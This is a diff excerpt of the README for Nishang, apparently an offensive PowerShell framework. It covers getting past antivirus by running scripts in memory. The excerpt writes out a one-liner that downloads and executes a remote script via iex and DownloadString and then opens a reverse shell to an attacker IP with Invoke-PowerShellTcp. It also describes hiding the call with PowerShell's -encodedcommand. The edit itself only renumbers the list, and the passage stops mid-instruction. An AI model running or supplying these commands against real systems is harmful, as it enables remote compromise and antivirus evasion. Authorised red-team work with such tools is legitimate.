samratashok/nishang/README.md

 ####Anti Virus
 Nishang scripts are flagged by many Anti Viruses as malicious.
 The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell.
 Two basic methods to execute PowerShell scripts in memory:

-1. Use the in-memory dowload and execute:
+Method 1.
+Use the in-memory dowload and execute:
 Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it.
 All the scripts in Nishang export a function with same name in the current PowerShell session.

 powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

-2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session.
+Method 2.
+Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session.
 Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell.
 For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

 Encode the scrript using Invoke-Encode from Nishang: